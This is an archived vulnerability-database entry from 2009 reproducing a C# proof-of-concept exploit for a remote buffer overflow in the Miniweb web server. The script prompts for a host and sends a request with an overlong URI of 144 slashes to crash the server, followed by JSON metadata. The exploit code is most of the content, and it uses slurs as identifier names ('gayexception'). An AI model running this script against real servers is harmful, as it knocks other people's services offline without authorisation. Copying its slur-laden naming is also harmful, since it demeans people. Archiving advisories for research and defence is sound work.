Description
################### Miniweb Remote Buffer Overflow ############################
########By: e.wiZz!
########Site: www.balcansecurity.com
######## Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
#################################################################
/* BoF when requesting URI longer than 120~ */
using System;
using System.IO;
using System.Net;
using System.Text;
namespace idiot
{
class pf
{
static void Main(string[] args)
{
Console.Write("Enter host:\n");
string site = Console.ReadLine();
string uri = null;
try
{
for (int i = 0; i < 144; i++) { uri += "/"; }
HttpWebRequest request = (HttpWebRequest)
HttpWebRequest.Create(site + uri);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
//any response we get means that exploit failed
if (response.GetResponseHeader("Content-Lenght") != "a")
{
Console.WriteLine("Exploit failed");
}
}
catch (Exception gayexception)
{
Console.WriteLine("Cannot connect");
Console.WriteLine("{0}", gayexception.Message);
}
}
}
}
{"id": "SECURITYVULNS:DOC:21671", "bulletinFamily": "software", "title": "Miniweb Buffer Overflow", "description": "################### Miniweb Remote Buffer Overflow ############################\r\n\r\n########By: e.wiZz!\r\n\r\n########Site: www.balcansecurity.com\r\n\r\n######## Found with ServMeNot (world's sexiest fuzzer :P )\r\n\r\n\r\n\r\nIn the wild...\r\n#################################################################\r\n\r\n/* BoF when requesting URI longer than 120~ */\r\n\r\nusing System;\r\nusing System.IO;\r\nusing System.Net;\r\nusing System.Text;\r\n\r\nnamespace idiot\r\n{\r\n class pf\r\n {\r\n static void Main(string[] args)\r\n {\r\n Console.Write("Enter host:\n");\r\n string site = Console.ReadLine();\r\n string uri = null;\r\n try\r\n {\r\n for (int i = 0; i < 144; i++) { uri += "/"; }\r\n HttpWebRequest request = (HttpWebRequest)\r\n HttpWebRequest.Create(site + uri);\r\n HttpWebResponse response = (HttpWebResponse)\r\n\r\n request.GetResponse();\r\n\r\n //any response we get means that exploit failed\r\n if (response.GetResponseHeader("Content-Lenght") != "a")\r\n {\r\n Console.WriteLine("Exploit failed");\r\n }\r\n\r\n }\r\n catch (Exception gayexception)\r\n {\r\n Console.WriteLine("Cannot connect");\r\n Console.WriteLine("{0}", gayexception.Message);\r\n }\r\n }\r\n }\r\n}", "published": "2009-04-16T00:00:00", "modified": "2009-04-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21671", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 10, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9842"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9842"]}]}, "exploitation": null, "vulnersScore": 0.3}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645341512, "score": 1659803227}, "_internal": {"score_hash": "251b4e68b243eb81272d7e982d4c6b7b"}}
{}